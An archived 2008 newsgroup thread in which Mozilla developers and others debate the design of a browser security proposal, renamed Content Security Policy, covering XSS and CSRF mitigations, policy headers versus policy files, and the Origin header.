Jul 11, 2008, 6:51:20 PM7/11/08
to
On Jun 25, 5:22 am, Gervase Markham <g...@mozilla.org> wrote:
> The documentation for Request-Source is now more complete, but it's a
> bit jumbled. I would make bullet 4 into bullet 2, and remove the second
> sentence because it's repeated in (new) bullet 3.

Good points. I'll make these changes.

> You didn't include the feature of a special value for the local domain.

> I note that in Content-Restrictions, I used "this":

Another good point. I prefer the use of "this" over the other
suggestion of "localhost" since the latter could create ambiguity
between the server the content came from and the user's local
machine. I'll add "this" to the proposal as well.

> We might also consider a special value for Script-Source of "head", if
> we are looking for ways to make it more palatable and
> easily-implementable for web authors.

I agree that it may be more palatable for authors, but it may come at
the expense of 1) security: while it is far less likely to find an
injection point in the <head> of a document, it is still possible, and
2) clarity of the new model: telling people to "move all your scripts
to external JS files" is a fairly large change to make, but it is
clear that anything remaining will not be executed. It also fits
nicely with the philosophy of separating behavior from content
structure. Telling people to "move all your scripts to external JS
files or the <head> of your document", while satisfying the behavior-
content separation, may potentially confuse people as to _why_ they
are separating their scripts. I am open to this, though, if others
feel it might be valuable.

> You may want to consider rethinking the names of the headers. At the
> moment, you would expect Script-Source and Request-Source to be
> parallel, but in fact Script-Source does something very similar to
> Request-Target, but just for script.

Agreed. I have been talking with Dan Veditz about this topic, and
there are some substantive changes and additions that need to be made
to the header names. I will likely follow-up with a separate post on
that topic since it could become rather lengthy.

> We do need to continue to think about the performance impact of
> Request-Source/Request-Origin.

True, and I'm hoping we can leverage some wisdom from the Access
Control specification regarding how to minimize performance overhead.
I know that spec is still in flux, though, and I'm paying attention to
the mailing list to track their progress.

> One option would be to have the site able
> to return a policy file in the body of the response to a HEAD request,
> which would define policy for that request and the entire site as well.
> This avoids the "well-known URL" problem, and gives the option of both
> page-specific responses and a general response.

I like the idea of being able to send "meta-policy" for a set of
resources larger than 1 to cut down on round-trips, etc. Is your
suggestion that the policy query return the meta-policy in the
response itself, or that it return a URL to a meta-policy file? I
think I would tend to favor the latter.

> It's not quite that simple. See the quirksMode.org page on inline event
> handlers:http://www.quirksmode.org/js/events_early.html
>
> If you want to permit suppression of the default action using an inline
> style, you may need to allow at least "return functionWithNoParams()".
> There are other ways to prevent the default action, but this one is
> quite familiar to people.
>
> Also, people often want to pass "this" or "event" to their event
> handlers so they know which item was clicked on or have access to event
> properties. More info on the latter here:http://www.quirksmode.org/js/events_access.html
>
> It's beginning to look like this might not fly...

All good points. Calling only zero-parameter functions appears to be
less useful than I originally thought. We will have to probably scrap
that idea.

As I mentioned, I have a set of changes that I need to make to the
proposal which I'll work on over the weekend and will follow up with
another post when I've collected my thoughts a bit more.

Regards,
Brandon

bsterne

unread,
Jul 11, 2008, 7:16:40 PM7/11/08
to
On Jul 10, 8:47 am, glenn.wurs...@gmail.com wrote:
> The problem is that although solutions exist
> to both of these problems, developers have not properly implemented
> the solution.  With your approach of SSP and safe requests, you are
> again relying on the developer to use the solution correctly, and put
> all modifications behind a POST request.  You have not removed the
> reliance on the developer to code correctly, just simply shifted it to
> a different 'thing' that they have to do.

Perhaps I am misunderstanding this point. Are you suggesting that an
ideal model wouldn't require that web developers do anything
differently than they currently are? Site Security Policy is intended
to be a belt-and-suspenders tool to protect sites and users, but we
are still advocating that developers keep their web applications free
of vulnerabilities.

> From previous conversation
> with Terri, asking for an example of where a GET request can be used
> to affect change on a web-site is asking for us to find a security
> vulnerability in a website, since this is basically the definition of
> a XSRF.  Large sites are going to be well protected against this type
> of thing, but I'm sure if you look at any of the recent CERT
> vulnerabilities regarding XSRF or XSS you'll notice that they are all
> exploitable through GET requests.

The restriction of CSRF protection to POST was not because we think
CSRF isn't common via GET, it is because there are too many ways that
cross-site GETs are possible, and in current legitimate use, to make
mitigating them worthwhile.

Evert | Rooftop

unread,
Jul 12, 2008, 1:35:25 PM7/12/08
to
Sorry if this was already brought up in this thread (or if its a
closed subject), but using headers vs. a policy file is a bad idea,
for the following reasons:

* Allows caching
* Allows usage of the policy on a site where there's no scripting
available (static content servers?)
* Allows a policy to enforced on a domain-level, instead of for every
html page
* Removes the HEAD before POST requirement

The last one is an important one for a different reason as well. PHP,
as an example, will execute scripts the same way regardless if its
HEAD, POST or GET, so this could produce unwanted results on existing
sites, not to mention a bandwidth and time overhead.

Terri

unread,
Jul 14, 2008, 4:45:11 PM7/14/08
to
On Jul 11, 7:16 pm, bsterne <bste...@mozilla.com> wrote:
> Perhaps I am misunderstanding this point.  Are you suggesting that an
> ideal model wouldn't require that web developers do anything
> differently than they currently are?  Site Security Policy is intended
> to be a belt-and-suspenders tool to protect sites and users, but we
> are still advocating that developers keep their web applications free
> of vulnerabilities.

In an ideal world, we wouldn't have attackers, and all code would be
functional, elegant and secure. ;) But we know how that goes...

Right now, a web developer who is willing to re-architect a site could
take advantage of existing mashup work to produce more secure code.
For example, they might look at the ways of isolating code used in
Subspace [1] or SMash [2] that work in an unmodified browser. Or they
could look towards enhanced-browser solutions like the <sandbox>
abstractions of MashupOS [3][4]. Plus there are input-checking tools
and data-tainting tools that can provide further protection.

The target market, as it were, for a "belt-and-suspenders" sort of
approach is probably not the people who have the time and skill to
rework an entire web application. Those people already have tools.
They might like to have better ones, but for the amount of effort
involved they probably want much more than a belt-and-suspenders level
of additional security.

The people who could benefit most from SSP are those who are
interested in additional security, but don't have the time (or
possibly the skills) for full audits of existing code. System
administrators who want to minimize risk to their servers. People who
have installed blogging/webmail/etc. software on their websites and
want additional security guarantees. Companies who feel they're at
high risk of people trying to do cross-site request forgery on their
sites and don't want a typo in input-checking to result in upset
customers.

Right now, these people could use a tool to help them enforce security
policies with relatively minimal effort, which is pretty much what SSP
is. But they'd benefit a lot more if it weren't necessary to also re-
architect their sites to ensure that they get the most out of SSP!

[1] http://www.collinjackson.com/research/papers/fp801-jackson.pdf
[2] http://domino.research.ibm.com/library/cyberdig.nsf/1e4115aea78b6e7c85256b360066f0d4/0ee2d79f8be461ce8525731b0009404d?OpenDocument
[3] http://www.usenix.org/event/hotos07/tech/full_papers/howell/howell_html/
[4] http://research.microsoft.com/~helenw/papers/sosp07MashupOS.pdf

Gervase Markham

unread,
Jul 16, 2008, 2:23:55 PM7/16/08
to
glenn....@gmail.com wrote:
> In terms of the safe vs. unsafe requests, perhaps I can lend some
> insight. The whole reason we have these XSS and XSRF attacks in the
> first place is because developers have messed up.

I agree - but this is because what they are asked to do is hard. There
are two things we can do about that - we can make the thing they are
trying to do easier, or we can provide another easier thing they can do
as well, which helps when they get the first thing wrong. That's the
approach we are taking.

> XSS 'can' be solved
> by proper input validation, and XSRF attacks 'can' be solved by using
> random identifiers in the links that perform an operation or examining
> the Referer HTTP header.

Note that Referer checking is not a solution, a) because it's optional
for privacy reasons, and b) because there are existing ways to fake one
(e.g. using Flash, I believe).

> the solution. With your approach of SSP and safe requests, you are
> again relying on the developer to use the solution correctly, and put
> all modifications behind a POST request. You have not removed the
> reliance on the developer to code correctly, just simply shifted it to
> a different 'thing' that they have to do.

Indeed. But there are multiple good reasons to put modifications behind
a POST request, including existing browser behaviour preventing
resubmission of POSTs. So it's something they may already be doing anyway.

> Related to the POST vs. GET arguments above is the fact that the only
> way of doing a POST request currently is by submitting a form. While
> browsers have gotten better at being able to customize the appearance
> of a submit button, they are still in no way perfect, and hence some
> of the visual style approaches that are possible on things like
> <a>...</a> are not possible on the<input> submit element. The re-
> arranging of the text (going from between the opening and closing<a>
> element to inside the value attribute of the input element) also
> contains several restrictions. A lot of HTML is usable inside the<a>
> and</a> but only plain-text is allowed inside the value attribute of
> the input element.

That's why we have the <button type="submit"> element, which allows
arbitrary HTML inside it.
http://htmlhelp.com/reference/html40/forms/button.html

Gerv

Glenn Wurster

unread,
Jul 17, 2008, 3:41:47 PM7/17/08
to
> I agree - but this is because what they are asked to do is hard. There
> are two things we can do about that - we can make the thing they are
> trying to do easier, or we can provide another easier thing they can do
> as well, which helps when they get the first thing wrong. That's the
> approach we are taking.

Yes, both approach attempts to make things easier as well. The
question is "how much easier do you want to make it?" SSP indeed does
make it easier to protect against XSRF by blocking cross-site POST
requests. Things would be even easier if SSP applied universally
(including GET requests) instead of only in certain circumstances.

> > XSS 'can' be solved
> > by proper input validation, and XSRF attacks 'can' be solved by using
> > random identifiers in the links that perform an operation or examining
> > the Referer HTTP header.
>
> Note that Referer checking is not a solution, a) because it's optional
> for privacy reasons, and b) because there are existing ways to fake one
> (e.g. using Flash, I believe).

Which still leaves random identifiers... (but this is getting off-
topic).

> Indeed. But there are multiple good reasons to put modifications behind
> a POST request, including existing browser behaviour preventing
> resubmission of POSTs. So it's something they may already be doing anyway.

Browsers preventing resubmission is only an issue for non-idempotent
requests (and even then, non-idempotent requests have been done over
GET).

The problem in this discussion is we are debating a point based on a
very one-sided view of the problem and what developers are capable
of. We know that the problem exists, and we know what developers need
to do in order to fix the problem. We can argue for a very long time
as to the merits of whether or not to protect GET, but the real kicker
will be whether or not the solution ends up helping. The same is true
for the argument of always doing operations over POST - we can argue
for a while but it's all about what developers are actually doing.
With POST, I think that the evidence points towards the fact that
developers perform operations through GET, even though the HTTP spec
suggests otherwise.

> That's why we have the <button type="submit"> element, which allows
> arbitrary HTML inside it.http://htmlhelp.com/reference/html40/forms/button.html

Learn something new every day. Did not know about that one. Thanks.

On another note, there is the issue of policy files vs. headers.
Evert has expressed a preference for policy files (in this discussion)
and I tend to agree with him - our work used with policy files. Adobe
used policy files for flash. Work by Justin Schuh also used policy
files (see http://taossa.com/index.php/2007/02/17/same-origin-proposal/
- this gives another related proposal). I think, especially with
reference to Request-Source, that getting rid of the header and using
a policy file would be a good idea.

Glenn.

bsterne

unread,
Aug 15, 2008, 1:03:59 PM8/15/08
to

Hi Evert,

I appreciate your comments and I am working hard on a set of changes
to the proposal based on a lot of feedback I've received both on the
newsgroup and in private communications. These changes, I think,
encompass the comments you made.

First, we do plan to support both HTTP headers as well as files for
policy transmission. That request has come from a number of people,
so it seems wise to give the people what they want :-) I am working
hard on modifying the proposal document to include these changes which
are fairly broad. I will spare most of the details now and will post
to the newsgroup when those changes have been published.

With regard to your last comment (re: PHP treating all requests
equally), I don't think that's quite accurate. Applications written
using the $_REQUEST super-global will suffer from that, but using
$_REQUEST only is not a best practice and most web applications should
reasonably be expected to differentiate POST, GET, and HEAD. However,
this point may be moot as we are starting to consider other options
for CSRF protection rather than the pre-flight requests originally
proposed. It may be the case that adding such policy requests for all
cross-site POSTs will have too high an impact on bandwidth, round
trips, etc.

Jackson, Barth and Mitchell have written a paper regarding CSRF
protection that utilizes a new HTTP header, Origin:
http://crypto.stanford.edu/websec/csrf/

An Origin header has also been proposed in the W3C's Access-Control
spec. I would be happy to hear feedback on utilizing this model
instead of the browser-based ingress/egress filtering model which was
originally proposed. In my opinion, it has several benefits most
notably: 1) ease of implementation for user agents, and 2) adds no
additional round trips and minimal additional bandwidth. It will also
be consistent with the Access-Control spec.

Thoughts?

-Brandon

bsterne

unread,
Sep 5, 2008, 7:19:29 PM9/5/08
to
I have updated the proposal document to reflect the changes I
mentioned briefly before. Chief among them are:

1. The name has been changed to Content Security Policy, mainly
because the mechanism describes security policies applied to
individual _resources_ and not entire websites. The change is
intended to reduce confusion.
2. The scope of the proposal has been reduced to just XSS
mitigations. We are now recommending the implementation of the Origin
header to address CSRF.
3. The policy syntax has been expanded to address a greater number of
types of content (not just script).

You can view the updated proposal here:
http://people.mozilla.org/~bsterne/content-security-policy

Cheers,
Brandon

0 new messages